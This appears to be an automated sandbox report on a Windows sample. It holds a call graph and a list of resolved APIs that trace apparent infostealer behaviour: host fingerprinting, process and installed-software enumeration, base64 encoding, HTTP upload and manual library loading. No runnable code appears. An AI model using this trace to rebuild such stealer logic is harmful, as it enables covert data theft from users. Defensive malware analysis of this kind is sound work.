14569->14570 14571 f7a920 3 API calls 14570->14571 14572 f65e54 14571->14572 14573 f7a8a0 lstrcpy 14572->14573 14574 f65e5d 14573->14574 14575 f65e70 lstrlen 14574->14575 15371 f7aad0 14575->15371 14577 f65e81 lstrlen GetProcessHeap RtlAllocateHeap 15372 f7aad0 14577->15372 14579 f65eae lstrlen 14580 f65ebe 14579->14580 14581 f65ed7 lstrlen 14580->14581 14582 f65ee7 14581->14582 14583 f65ef0 lstrlen 14582->14583 14584 f65f04 14583->14584 14585 f65f1a lstrlen 14584->14585 15373 f7aad0 14585->15373 14587 f65f2a HttpSendRequestA 14588 f65f35 InternetReadFile 14587->14588 14589 f65f6a InternetCloseHandle 14588->14589 14593 f65f61 14588->14593 14589->14513 14591 f7a9b0 4 API calls 14591->14593 14592 f7a8a0 lstrcpy 14592->14593 14593->14588 14593->14589 14593->14591 14593->14592 14596 f71077 14594->14596 14595 f71151 14595->13365 14596->14595 14597 f7a820 lstrlen lstrcpy 14596->14597 14597->14596 14603 f70db7 14598->14603 14599 f70f17 14599->13373 14600 f70e27 StrCmpCA 14600->14603 14601 f70e67 StrCmpCA 14601->14603 14602 f70ea4 StrCmpCA 14602->14603 14603->14599 14603->14600 14603->14601 14603->14602 14604 f7a820 lstrlen lstrcpy 14603->14604 14604->14603 14606 f70f67 14605->14606 14607 f71044 14606->14607 14608 f70fb2 StrCmpCA 14606->14608 14609 f7a820 lstrlen lstrcpy 14606->14609 14607->13381 14608->14606 14609->14606 14611 f7a740 lstrcpy 14610->14611 14612 f71a26 14611->14612 14613 f7a9b0 4 API calls 14612->14613 14614 f71a37 14613->14614 14615 f7a8a0 lstrcpy 14614->14615 14616 f71a40 14615->14616 14617 f7a9b0 4 API calls 14616->14617 14618 f71a5b 14617->14618 14619 f7a8a0 lstrcpy 14618->14619 14620 f71a64 14619->14620 14621 f7a9b0 4 API calls 14620->14621 14622 f71a7d 14621->14622 14623 f7a8a0 lstrcpy 14622->14623 14624 f71a86 14623->14624 14625 f7a9b0 4 API calls 14624->14625 14626 f71aa1 14625->14626 14627 f7a8a0 lstrcpy 14626->14627 14628 f71aaa 14627->14628 14629 f7a9b0 4 API calls 14628->14629 14630 f71ac3 14629->14630 14631 f7a8a0 lstrcpy 14630->14631 14632 f71acc 14631->14632 14633 f7a9b0 4 API calls 14632->14633 14634 f71ae7 14633->14634 14635 f7a8a0 lstrcpy 14634->14635 14636 f71af0 14635->14636 14637 f7a9b0 4 API calls 14636->14637 14638 f71b09 14637->14638 14639 f7a8a0 lstrcpy 14638->14639 14640 f71b12 14639->14640 14641 f7a9b0 4 API calls 14640->14641 14642 f71b2d 14641->14642 14643 f7a8a0 lstrcpy 14642->14643 14644 f71b36 14643->14644 14645 f7a9b0 4 API calls 14644->14645 14646 f71b4f 14645->14646 14647 f7a8a0 lstrcpy 14646->14647 14648 f71b58 14647->14648 14649 f7a9b0 4 API calls 14648->14649 14650 f71b76 14649->14650 14651 f7a8a0 lstrcpy 14650->14651 14652 f71b7f 14651->14652 14653 f77500 6 API calls 14652->14653 14654 f71b96 14653->14654 14655 f7a920 3 API calls 14654->14655 14656 f71ba9 14655->14656 14657 f7a8a0 lstrcpy 14656->14657 14658 f71bb2 14657->14658 14659 f7a9b0 4 API calls 14658->14659 14660 f71bdc 14659->14660 14661 f7a8a0 lstrcpy 14660->14661 14662 f71be5 14661->14662 14663 f7a9b0 4 API calls 14662->14663 14664 f71c05 14663->14664 14665 f7a8a0 lstrcpy 14664->14665 14666 f71c0e 14665->14666 15374 f77690 GetProcessHeap RtlAllocateHeap 14666->15374 14669 f7a9b0 4 API calls 14670 f71c2e 14669->14670 14671 f7a8a0 lstrcpy 14670->14671 14672 f71c37 14671->14672 14673 f7a9b0 4 API calls 14672->14673 14674 f71c56 14673->14674 14675 f7a8a0 lstrcpy 14674->14675 14676 f71c5f 14675->14676 14677 f7a9b0 4 API calls 14676->14677 14678 f71c80 14677->14678 14679 f7a8a0 lstrcpy 14678->14679 14680 f71c89 14679->14680 15381 f777c0 GetCurrentProcess IsWow64Process 14680->15381 14683 f7a9b0 4 API calls 14684 f71ca9 14683->14684 14685 f7a8a0 lstrcpy 14684->14685 14686 f71cb2 14685->14686 14687 f7a9b0 4 API calls 14686->14687 14688 f71cd1 14687->14688 14689 f7a8a0 lstrcpy 14688->14689 14690 f71cda 14689->14690 14691 f7a9b0 4 API calls 14690->14691 14692 f71cfb 14691->14692 14693 f7a8a0 lstrcpy 14692->14693 14694 f71d04 14693->14694 14695 f77850 3 API calls 14694->14695 14696 f71d14 14695->14696 14697 f7a9b0 4 API calls 14696->14697 14698 f71d24 14697->14698 14699 f7a8a0 lstrcpy 14698->14699 14700 f71d2d 14699->14700 14701 f7a9b0 4 API calls 14700->14701 14702 f71d4c 14701->14702 14703 f7a8a0 lstrcpy 14702->14703 14704 f71d55 14703->14704 14705 f7a9b0 4 API calls 14704->14705 14706 f71d75 14705->14706 14707 f7a8a0 lstrcpy 14706->14707 14708 f71d7e 14707->14708 14709 f778e0 3 API calls 14708->14709 14710 f71d8e 14709->14710 14711 f7a9b0 4 API calls 14710->14711 14712 f71d9e 14711->14712 14713 f7a8a0 lstrcpy 14712->14713 14714 f71da7 14713->14714 14715 f7a9b0 4 API calls 14714->14715 14716 f71dc6 14715->14716 14717 f7a8a0 lstrcpy 14716->14717 14718 f71dcf 14717->14718 14719 f7a9b0 4 API calls 14718->14719 14720 f71df0 14719->14720 14721 f7a8a0 lstrcpy 14720->14721 14722 f71df9 14721->14722 15383 f77980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14722->15383 14725 f7a9b0 4 API calls 14726 f71e19 14725->14726 14727 f7a8a0 lstrcpy 14726->14727 14728 f71e22 14727->14728 14729 f7a9b0 4 API calls 14728->14729 14730 f71e41 14729->14730 14731 f7a8a0 lstrcpy 14730->14731 14732 f71e4a 14731->14732 14733 f7a9b0 4 API calls 14732->14733 14734 f71e6b 14733->14734 14735 f7a8a0 lstrcpy 14734->14735 14736 f71e74 14735->14736 15385 f77a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14736->15385 14739 f7a9b0 4 API calls 14740 f71e94 14739->14740 14741 f7a8a0 lstrcpy 14740->14741 14742 f71e9d 14741->14742 14743 f7a9b0 4 API calls 14742->14743 14744 f71ebc 14743->14744 14745 f7a8a0 lstrcpy 14744->14745 14746 f71ec5 14745->14746 14747 f7a9b0 4 API calls 14746->14747 14748 f71ee5 14747->14748 14749 f7a8a0 lstrcpy 14748->14749 14750 f71eee 14749->14750 15388 f77b00 GetUserDefaultLocaleName 14750->15388 14753 f7a9b0 4 API calls 14754 f71f0e 14753->14754 14755 f7a8a0 lstrcpy 14754->14755 14756 f71f17 14755->14756 14757 f7a9b0 4 API calls 14756->14757 14758 f71f36 14757->14758 14759 f7a8a0 lstrcpy 14758->14759 14760 f71f3f 14759->14760 14761 f7a9b0 4 API calls 14760->14761 14762 f71f60 14761->14762 14763 f7a8a0 lstrcpy 14762->14763 14764 f71f69 14763->14764 15392 f77b90 14764->15392 14766 f71f80 14767 f7a920 3 API calls 14766->14767 14768 f71f93 14767->14768 14769 f7a8a0 lstrcpy 14768->14769 14770 f71f9c 14769->14770 14771 f7a9b0 4 API calls 14770->14771 14772 f71fc6 14771->14772 14773 f7a8a0 lstrcpy 14772->14773 14774 f71fcf 14773->14774 14775 f7a9b0 4 API calls 14774->14775 14776 f71fef 14775->14776 14777 f7a8a0 lstrcpy 14776->14777 14778 f71ff8 14777->14778 15404 f77d80 GetSystemPowerStatus 14778->15404 14781 f7a9b0 4 API calls 14782 f72018 14781->14782 14783 f7a8a0 lstrcpy 14782->14783 14784 f72021 14783->14784 14785 f7a9b0 4 API calls 14784->14785 14786 f72040 14785->14786 14787 f7a8a0 lstrcpy 14786->14787 14788 f72049 14787->14788 14789 f7a9b0 4 API calls 14788->14789 14790 f7206a 14789->14790 14791 f7a8a0 lstrcpy 14790->14791 14792 f72073 14791->14792 14793 f7207e GetCurrentProcessId 14792->14793 15406 f79470 OpenProcess 14793->15406 14796 f7a920 3 API calls 14797 f720a4 14796->14797 14798 f7a8a0 lstrcpy 14797->14798 14799 f720ad 14798->14799 14800 f7a9b0 4 API calls 14799->14800 14801 f720d7 14800->14801 14802 f7a8a0 lstrcpy 14801->14802 14803 f720e0 14802->14803 14804 f7a9b0 4 API calls 14803->14804 14805 f72100 14804->14805 14806 f7a8a0 lstrcpy 14805->14806 14807 f72109 14806->14807 15411 f77e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14807->15411 14810 f7a9b0 4 API calls 14811 f72129 14810->14811 14812 f7a8a0 lstrcpy 14811->14812 14813 f72132 14812->14813 14814 f7a9b0 4 API calls 14813->14814 14815 f72151 14814->14815 14816 f7a8a0 lstrcpy 14815->14816 14817 f7215a 14816->14817 14818 f7a9b0 4 API calls 14817->14818 14819 f7217b 14818->14819 14820 f7a8a0 lstrcpy 14819->14820 14821 f72184 14820->14821 15415 f77f60 14821->15415 14824 f7a9b0 4 API calls 14825 f721a4 14824->14825 14826 f7a8a0 lstrcpy 14825->14826 14827 f721ad 14826->14827 14828 f7a9b0 4 API calls 14827->14828 14829 f721cc 14828->14829 14830 f7a8a0 lstrcpy 14829->14830 14831 f721d5 14830->14831 14832 f7a9b0 4 API calls 14831->14832 14833 f721f6 14832->14833 14834 f7a8a0 lstrcpy 14833->14834 14835 f721ff 14834->14835 15428 f77ed0 GetSystemInfo wsprintfA 14835->15428 14838 f7a9b0 4 API calls 14839 f7221f 14838->14839 14840 f7a8a0 lstrcpy 14839->14840 14841 f72228 14840->14841 14842 f7a9b0 4 API calls 14841->14842 14843 f72247 14842->14843 14844 f7a8a0 lstrcpy 14843->14844 14845 f72250 14844->14845 14846 f7a9b0 4 API calls 14845->14846 14847 f72270 14846->14847 14848 f7a8a0 lstrcpy 14847->14848 14849 f72279 14848->14849 15430 f78100 GetProcessHeap RtlAllocateHeap 14849->15430 14852 f7a9b0 4 API calls 14853 f72299 14852->14853 14854 f7a8a0 lstrcpy 14853->14854 14855 f722a2 14854->14855 14856 f7a9b0 4 API calls 14855->14856 14857 f722c1 14856->14857 14858 f7a8a0 lstrcpy 14857->14858 14859 f722ca 14858->14859 14860 f7a9b0 4 API calls 14859->14860 14861 f722eb 14860->14861 14862 f7a8a0 lstrcpy 14861->14862 14863 f722f4 14862->14863 15436 f787c0 14863->15436 14866 f7a920 3 API calls 14867 f7231e 14866->14867 14868 f7a8a0 lstrcpy 14867->14868 14869 f72327 14868->14869 14870 f7a9b0 4 API calls 14869->14870 14871 f72351 14870->14871 14872 f7a8a0 lstrcpy 14871->14872 14873 f7235a 14872->14873 14874 f7a9b0 4 API calls 14873->14874 14875 f7237a 14874->14875 14876 f7a8a0 lstrcpy 14875->14876 14877 f72383 14876->14877 14878 f7a9b0 4 API calls 14877->14878 14879 f723a2 14878->14879 14880 f7a8a0 lstrcpy 14879->14880 14881 f723ab 14880->14881 15441 f781f0 14881->15441 14883 f723c2 14884 f7a920 3 API calls 14883->14884 14885 f723d5 14884->14885 14886 f7a8a0 lstrcpy 14885->14886 14887 f723de 14886->14887 14888 f7a9b0 4 API calls 14887->14888 14889 f7240a 14888->14889 14890 f7a8a0 lstrcpy 14889->14890 14891 f72413 14890->14891 14892 f7a9b0 4 API calls 14891->14892 14893 f72432 14892->14893 14894 f7a8a0 lstrcpy 14893->14894 14895 f7243b 14894->14895 14896 f7a9b0 4 API calls 14895->14896 14897 f7245c 14896->14897 14898 f7a8a0 lstrcpy 14897->14898 14899 f72465 14898->14899 14900 f7a9b0 4 API calls 14899->14900 14901 f72484 14900->14901 14902 f7a8a0 lstrcpy 14901->14902 14903 f7248d 14902->14903 14904 f7a9b0 4 API calls 14903->14904 14905 f724ae 14904->14905 14906 f7a8a0 lstrcpy 14905->14906 14907 f724b7 14906->14907 15449 f78320 14907->15449 14909 f724d3 14910 f7a920 3 API calls 14909->14910 14911 f724e6 14910->14911 14912 f7a8a0 lstrcpy 14911->14912 14913 f724ef 14912->14913 14914 f7a9b0 4 API calls 14913->14914 14915 f72519 14914->14915 14916 f7a8a0 lstrcpy 14915->14916 14917 f72522 14916->14917 14918 f7a9b0 4 API calls 14917->14918 14919 f72543 14918->14919 14920 f7a8a0 lstrcpy 14919->14920 14921 f7254c 14920->14921 14922 f78320 17 API calls 14921->14922 14923 f72568 14922->14923 14924 f7a920 3 API calls 14923->14924 14925 f7257b 14924->14925 14926 f7a8a0 lstrcpy 14925->14926 14927 f72584 14926->14927 14928 f7a9b0 4 API calls 14927->14928 14929 f725ae 14928->14929 14930 f7a8a0 lstrcpy 14929->14930 14931 f725b7 14930->14931 14932 f7a9b0 4 API calls 14931->14932 14933 f725d6 14932->14933 14934 f7a8a0 lstrcpy 14933->14934 14935 f725df 14934->14935 14936 f7a9b0 4 API calls 14935->14936 14937 f72600 14936->14937 14938 f7a8a0 lstrcpy 14937->14938 14939 f72609 14938->14939 15485 f78680 14939->15485 14941 f72620 14942 f7a920 3 API calls 14941->14942 14943 f72633 14942->14943 14944 f7a8a0 lstrcpy 14943->14944 14945 f7263c 14944->14945 14946 f7265a lstrlen 14945->14946 14947 f7266a 14946->14947 14948 f7a740 lstrcpy 14947->14948 14949 f7267c 14948->14949 14950 f61590 lstrcpy 14949->14950 14951 f7268d 14950->14951 15495 f75190 14951->15495 14953 f72699 14953->13385 15683 f7aad0 14954->15683 14956 f65009 InternetOpenUrlA 14960 f65021 14956->14960 14957 f650a0 InternetCloseHandle InternetCloseHandle 14959 f650ec 14957->14959 14958 f6502a InternetReadFile 14958->14960 14959->13389 14960->14957 14960->14958 15684 f698d0 14961->15684 14963 f70759 14964 f7077d 14963->14964 14965 f70a38 14963->14965 14967 f70799 StrCmpCA 14964->14967 14966 f61590 lstrcpy 14965->14966 14968 f70a49 14966->14968 14969 f707a8 14967->14969 14996 f70843 14967->14996 15860 f70250 14968->15860 14971 f7a7a0 lstrcpy 14969->14971 14974 f707c3 14971->14974 14973 f70865 StrCmpCA 14975 f70874 14973->14975 15013 f7096b 14973->15013 14976 f61590 lstrcpy 14974->14976 14977 f7a740 lstrcpy 14975->14977 14978 f7080c 14976->14978 14980 f70881 14977->14980 14981 f7a7a0 lstrcpy 14978->14981 14979 f7099c StrCmpCA 14982 f709ab 14979->14982 15002 f70a2d 14979->15002 14983 f7a9b0 4 API calls 14980->14983 14984 f70823 14981->14984 14985 f61590 lstrcpy 14982->14985 14986 f708ac 14983->14986 14987 f7a7a0 lstrcpy 14984->14987 14988 f709f4 14985->14988 14989 f7a920 3 API calls 14986->14989 14990 f7083e 14987->14990 14991 f7a7a0 lstrcpy 14988->14991 14992 f708b3 14989->14992 15687 f6fb00 14990->15687 14994 f70a0d 14991->14994 14995 f7a9b0 4 API calls 14992->14995 14997 f7a7a0 lstrcpy 14994->14997 14998 f708ba 14995->14998 14996->14973 14999 f70a28 14997->14999 15000 f7a8a0 lstrcpy 14998->15000 15803 f70030 14999->15803 15002->13393 15013->14979 15335 f7a7a0 lstrcpy 15334->15335 15336 f61683 15335->15336 15337 f7a7a0 lstrcpy 15336->15337 15338 f61695 15337->15338 15339 f7a7a0 lstrcpy 15338->15339 15340 f616a7 15339->15340 15341 f7a7a0 lstrcpy 15340->15341 15342 f615a3 15341->15342 15342->14216 15344 f647c6 15343->15344 15345 f64838 lstrlen 15344->15345 15369 f7aad0 15345->15369 15347 f64848 InternetCrackUrlA 15348 f64867 15347->15348 15348->14293 15350 f7a740 lstrcpy 15349->15350 15351 f78b74 15350->15351 15352 f7a740 lstrcpy 15351->15352 15353 f78b82 GetSystemTime 15352->15353 15355 f78b99 15353->15355 15354 f7a7a0 lstrcpy 15356 f78bfc 15354->15356 15355->15354 15356->14308 15358 f7a931 15357->15358 15359 f7a988 15358->15359 15362 f7a968 lstrcpy lstrcat 15358->15362 15360 f7a7a0 lstrcpy 15359->15360 15361 f7a994 15360->15361 15361->14311 15362->15359 15363->14426 15365 f64eee 15364->15365 15366 f69af9 LocalAlloc 15364->15366 15365->14314 15365->14317 15366->15365 15367 f69b14 CryptStringToBinaryA 15366->15367 15367->15365 15368 f69b39 LocalFree 15367->15368 15368->15365 15369->15347 15370->14436 15371->14577 15372->14579 15373->14587 15502 f777a0 15374->15502 15377 f776c6 RegOpenKeyExA 15379 f776e7 RegQueryValueExA 15377->15379 15380 f77704 RegCloseKey 15377->15380 15378 f71c1e 15378->14669 15379->15380 15380->15378 15382 f71c99 15381->15382 15382->14683 15384 f71e09 15383->15384 15384->14725 15386 f71e84 15385->15386 15387 f77a9a wsprintfA 15385->15387 15386->14739 15387->15386 15389 f71efe 15388->15389 15390 f77b4d 15388->15390 15389->14753 15509 f78d20 LocalAlloc CharToOemW 15390->15509 15393 f7a740 lstrcpy 15392->15393 15394 f77bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15393->15394 15403 f77c25 15394->15403 15395 f77c46 GetLocaleInfoA 15395->15403 15396 f77d18 15397 f77d1e LocalFree 15396->15397 15398 f77d28 15396->15398 15397->15398 15400 f7a7a0 lstrcpy 15398->15400 15399 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15399->15403 15402 f77d37 15400->15402 15401 f7a8a0 lstrcpy 15401->15403 15402->14766 15403->15395 15403->15396 15403->15399 15403->15401 15405 f72008 15404->15405 15405->14781 15407 f794b5 15406->15407 15408 f79493 GetModuleFileNameExA CloseHandle 15406->15408 15409 f7a740 lstrcpy 15407->15409 15408->15407 15410 f72091 15409->15410 15410->14796 15412 f72119 15411->15412 15413 f77e68 RegQueryValueExA 15411->15413 15412->14810 15414 f77e8e RegCloseKey 15413->15414 15414->15412 15416 f77fb9 GetLogicalProcessorInformationEx 15415->15416 15417 f77fd8 GetLastError 15416->15417 15423 f78029 15416->15423 15418 f78022 15417->15418 15427 f77fe3 15417->15427 15421 f72194 15418->15421 15422 f789f0 2 API calls 15418->15422 15421->14824 15422->15421 15424 f789f0 2 API calls 15423->15424 15425 f7807b 15424->15425 15425->15418 15426 f78084 wsprintfA 15425->15426 15426->15421 15427->15416 15427->15421 15510 f789f0 15427->15510 15513 f78a10 GetProcessHeap RtlAllocateHeap 15427->15513 15429 f7220f 15428->15429 15429->14838 15431 f789b0 15430->15431 15432 f7814d GlobalMemoryStatusEx 15431->15432 15435 f78163 15432->15435 15433 f7819b wsprintfA 15434 f72289 15433->15434 15434->14852 15435->15433 15437 f787fb GetProcessHeap RtlAllocateHeap wsprintfA 15436->15437 15439 f7a740 lstrcpy 15437->15439 15440 f7230b 15439->15440 15440->14866 15442 f7a740 lstrcpy 15441->15442 15443 f78229 15442->15443 15444 f78263 15443->15444 15447 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15443->15447 15448 f7a8a0 lstrcpy 15443->15448 15445 f7a7a0 lstrcpy 15444->15445 15446 f782dc 15445->15446 15446->14883 15447->15443 15448->15443 15450 f7a740 lstrcpy 15449->15450 15451 f7835c RegOpenKeyExA 15450->15451 15452 f783d0 15451->15452 15453 f783ae 15451->15453 15455 f78613 RegCloseKey 15452->15455 15456 f783f8 RegEnumKeyExA 15452->15456 15454 f7a7a0 lstrcpy 15453->15454 15465 f783bd 15454->15465 15457 f7a7a0 lstrcpy 15455->15457 15458 f7843f wsprintfA RegOpenKeyExA 15456->15458 15459 f7860e 15456->15459 15457->15465 15460 f78485 RegCloseKey RegCloseKey 15458->15460 15461 f784c1 RegQueryValueExA 15458->15461 15459->15455 15462 f7a7a0 lstrcpy 15460->15462 15463 f78601 RegCloseKey 15461->15463 15464 f784fa lstrlen 15461->15464 15462->15465 15463->15459 15464->15463 15466 f78510 15464->15466 15465->14909 15467 f7a9b0 4 API calls 15466->15467 15468 f78527 15467->15468 15469 f7a8a0 lstrcpy 15468->15469 15470 f78533 15469->15470 15471 f7a9b0 4 API calls 15470->15471 15472 f78557 15471->15472 15473 f7a8a0 lstrcpy 15472->15473 15474 f78563 15473->15474 15475 f7856e RegQueryValueExA 15474->15475 15475->15463 15476 f785a3 15475->15476 15477 f7a9b0 4 API calls 15476->15477 15478 f785ba 15477->15478 15479 f7a8a0 lstrcpy 15478->15479 15480 f785c6 15479->15480 15481 f7a9b0 4 API calls 15480->15481 15482 f785ea 15481->15482 15483 f7a8a0 lstrcpy 15482->15483 15484 f785f6 15483->15484 15484->15463 15486 f7a740 lstrcpy 15485->15486 15487 f786bc CreateToolhelp32Snapshot Process32First 15486->15487 15488 f7875d CloseHandle 15487->15488 15489 f786e8 Process32Next 15487->15489 15490 f7a7a0 lstrcpy 15488->15490 15489->15488 15491 f786fd 15489->15491 15492 f78776 15490->15492 15491->15489 15493 f7a9b0 lstrcpy lstrlen lstrcpy lstrcat 15491->15493 15494 f7a8a0 lstrcpy 15491->15494 15492->14941 15493->15491 15494->15491 15496 f7a7a0 lstrcpy 15495->15496 15497 f751b5 15496->15497 15498 f61590 lstrcpy 15497->15498 15499 f751c6 15498->15499 15514 f65100 15499->15514 15501 f751cf 15501->14953 15505 f77720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15502->15505 15504 f776b9 15504->15377 15504->15378 15506 f77765 RegQueryValueExA 15505->15506 15507 f77780 RegCloseKey 15505->15507 15506->15507 15508 f77793 15507->15508 15508->15504 15509->15389 15511 f78a0c 15510->15511 15512 f789f9 GetProcessHeap HeapFree 15510->15512 15511->15427 15512->15511 15513->15427 15515 f7a7a0 lstrcpy 15514->15515 15516 f65119 15515->15516 15517 f647b0 2 API calls 15516->15517 15518 f65125 15517->15518 15674 f78ea0 15518->15674 15520 f65184 15521 f65192 lstrlen 15520->15521 15522 f651a5 15521->15522 15523 f78ea0 4 API calls 15522->15523 15524 f651b6 15523->15524 15525 f7a740 lstrcpy 15524->15525 15526 f651c9 15525->15526 15527 f7a740 lstrcpy 15526->15527 15528 f651d6 15527->15528 15529 f7a740 lstrcpy 15528->15529 15530 f651e3 15529->15530 15531 f7a740 lstrcpy 15530->15531 15532 f651f0 15531->15532 15533 f7a740 lstrcpy 15532->15533 15534 f651fd InternetOpenA StrCmpCA 15533->15534 15535 f6522f 15534->15535 15536 f658c4 InternetCloseHandle 15535->15536 15537 f78b60 3 API calls 15535->15537 15544 f658d9 ctype 15536->15544 15538 f6524e 15537->15538 15539 f7a920 3 API calls 15538->15539 15540 f65261 15539->15540 15541 f7a8a0 lstrcpy 15540->15541 15542 f6526a 15541->15542 15543 f7a9b0 4 API calls 15542->15543 15545 f652ab 15543->15545 15547 f7a7a0 lstrcpy 15544->15547 15546 f7a920 3 API calls 15545->15546 15548 f652b2 15546->15548 15555 f65913 15547->15555 15549 f7a9b0 4 API calls 15548->15549 15550 f652b9 15549->15550 15551 f7a8a0 lstrcpy 15550->15551 15552 f652c2 15551->15552 15553 f7a9b0 4 API calls 15552->15553 15554 f65303 15553->15554 15556 f7a920 3 API calls 15554->15556 15555->15501 15557 f6530a 15556->15557 15558 f7a8a0 lstrcpy 15557->15558 15559 f65313 15558->15559 15560 f65329 InternetConnectA 15559->15560 15560->15536 15561 f65359 HttpOpenRequestA 15560->15561 15563 f658b7 InternetCloseHandle 15561->15563 15564 f653b7 15561->15564 15563->15536 15565 f7a9b0 4 API calls 15564->15565 15566 f653cb 15565->15566 15567 f7a8a0 lstrcpy 15566->15567 15568 f653d4 15567->15568 15569 f7a920 3 API calls 15568->15569 15570 f653f2 15569->15570 15571 f7a8a0 lstrcpy 15570->15571 15572 f653fb 15571->15572 15573 f7a9b0 4 API calls 15572->15573 15574 f6541a 15573->15574 15575 f7a8a0 lstrcpy 15574->15575 15576 f65423 15575->15576 15577 f7a9b0 4 API calls 15576->15577 15578 f65444 15577->15578 15579 f7a8a0 lstrcpy 15578->15579 15580 f6544d 15579->15580 15581 f7a9b0 4 API calls 15580->15581 15582 f6546e 15581->15582 15675 f78ead CryptBinaryToStringA 15674->15675 15676 f78ea9 15674->15676 15675->15676 15677 f78ece GetProcessHeap RtlAllocateHeap 15675->15677 15676->15520 15677->15676 15678 f78ef4 ctype 15677->15678 15679 f78f05 CryptBinaryToStringA 15678->15679 15679->15676 15683->14956 15926 f69880 15684->15926 15686 f698e1 15686->14963 15688 f7a740 lstrcpy 15687->15688 15861 f7a740 lstrcpy 15860->15861 15862 f70266 15861->15862 15863 f78de0 2 API calls 15862->15863 15864 f7027b 15863->15864 15865 f7a920 3 API calls 15864->15865 15866 f7028b 15865->15866 15867 f7a8a0 lstrcpy 15866->15867 15868 f70294 15867->15868 15869 f7a9b0 4 API calls 15868->15869 15927 f6988e 15926->15927 15930 f66fb0 15927->15930 15929 f698ad ctype 15929->15686 15933 f66d40 15930->15933 15934 f66d63 15933->15934 15948 f66d59 15933->15948 15949 f66530 15934->15949 15938 f66dbe 15938->15948 15959 f669b0 15938->15959 15940 f66e2a 15941 f66ee6 VirtualFree 15940->15941 15943 f66ef7 15940->15943 15940->15948 15941->15943 15942 f66f41 15946 f789f0 2 API calls 15942->15946 15942->15948 15943->15942 15944 f66f26 FreeLibrary 15943->15944 15945 f66f38 15943->15945 15944->15943 15947 f789f0 2 API calls 15945->15947 15946->15948 15947->15942 15948->15929 15950 f66542 15949->15950 15952 f66549 15950->15952 15969 f78a10 GetProcessHeap RtlAllocateHeap 15950->15969 15952->15948 15953 f66660 15952->15953 15956 f6668f VirtualAlloc 15953->15956 15955 f66730 15957 f66743 VirtualAlloc 15955->15957 15958 f6673c 15955->15958 15956->15955 15956->15958 15957->15958 15958->15938 15960 f669c9 15959->15960 15961 f669d5 15959->15961 15960->15961 15962 f66a09 LoadLibraryA 15960->15962 15961->15940 15962->15961 15963 f66a32 15962->15963 15966 f66ae0 15963->15966 15970 f78a10 GetProcessHeap RtlAllocateHeap 15963->15970 15965 f66ba8 GetProcAddress 15965->15961 15965->15966 15966->15961 15966->15965 15967 f789f0 2 API calls 15967->15966 15968 f66a8b 15968->15961 15968->15967 15969->15952 15970->15968

                                  Executed Functions

                                  Function 00F79860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 f79860-f79874 call f79750 663 f79a93-f79af2 LoadLibraryA * 5 660->663 664 f7987a-f79a8e call f79780 GetProcAddress * 21 660->664 666 f79af4-f79b08 GetProcAddress 663->666 667 f79b0d-f79b14 663->667 664->663 666->667 668 f79b46-f79b4d 667->668 669 f79b16-f79b41 GetProcAddress * 2 667->669 671 f79b4f-f79b63 GetProcAddress 668->671 672 f79b68-f79b6f 668->672 669->668 671->672 673 f79b71-f79b84 GetProcAddress 672->673 674 f79b89-f79b90 672->674 673->674 675 f79b92-f79bbc GetProcAddress * 2 674->675 676 f79bc1-f79bc2 674->676 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75550000,016F0618), ref: 00F798A1
                                  • GetProcAddress.KERNEL32(75550000,016F07E0), ref: 00F798BA
                                  • GetProcAddress.KERNEL32(75550000,016F0720), ref: 00F798D2
                                  • GetProcAddress.KERNEL32(75550000,016F07F8), ref: 00F798EA
                                  • GetProcAddress.KERNEL32(75550000,016F0840), ref: 00F79903
                                  • GetProcAddress.KERNEL32(75550000,016F8860), ref: 00F7991B
                                  • GetProcAddress.KERNEL32(75550000,016E6500), ref: 00F79933
                                  • GetProcAddress.KERNEL32(75550000,016E6620), ref: 00F7994C
                                  • GetProcAddress.KERNEL32(75550000,016F0588), ref: 00F79964
                                  • GetProcAddress.KERNEL32(75550000,016F05A0), ref: 00F7997C
                                  • GetProcAddress.KERNEL32(75550000,016F0660), ref: 00F79995
                                  • GetProcAddress.KERNEL32(75550000,016F0678), ref: 00F799AD
                                  • GetProcAddress.KERNEL32(75550000,016E6360), ref: 00F799C5
                                  • GetProcAddress.KERNEL32(75550000,016F05D0), ref: 00F799DE
                                  • GetProcAddress.KERNEL32(75550000,016F05E8), ref: 00F799F6
                                  • GetProcAddress.KERNEL32(75550000,016E6660), ref: 00F79A0E
                                  • GetProcAddress.KERNEL32(75550000,016F0690), ref: 00F79A27
                                  • GetProcAddress.KERNEL32(75550000,016F0900), ref: 00F79A3F
                                  • GetProcAddress.KERNEL32(75550000,016E65E0), ref: 00F79A57
                                  • GetProcAddress.KERNEL32(75550000,016F08B8), ref: 00F79A70
                                  • GetProcAddress.KERNEL32(75550000,016E6600), ref: 00F79A88
                                  • LoadLibraryA.KERNEL32(016F08E8,?,00F76A00), ref: 00F79A9A
                                  • LoadLibraryA.KERNEL32(016F08D0,?,00F76A00), ref: 00F79AAB
                                  • LoadLibraryA.KERNEL32(016F0870,?,00F76A00), ref: 00F79ABD
                                  • LoadLibraryA.KERNEL32(016F0918,?,00F76A00), ref: 00F79ACF
                                  • LoadLibraryA.KERNEL32(016F0888,?,00F76A00), ref: 00F79AE0
                                  • GetProcAddress.KERNEL32(75670000,016F0858), ref: 00F79B02
                                  • GetProcAddress.KERNEL32(75750000,016F08A0), ref: 00F79B23
                                  • GetProcAddress.KERNEL32(75750000,016F8DF0), ref: 00F79B3B
                                  • GetProcAddress.KERNEL32(76BE0000,016F8EE0), ref: 00F79B5D
                                  • GetProcAddress.KERNEL32(759D0000,016E6460), ref: 00F79B7E
                                  • GetProcAddress.KERNEL32(773F0000,016F88A0), ref: 00F79B9F
                                  • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00F79BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00F79BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
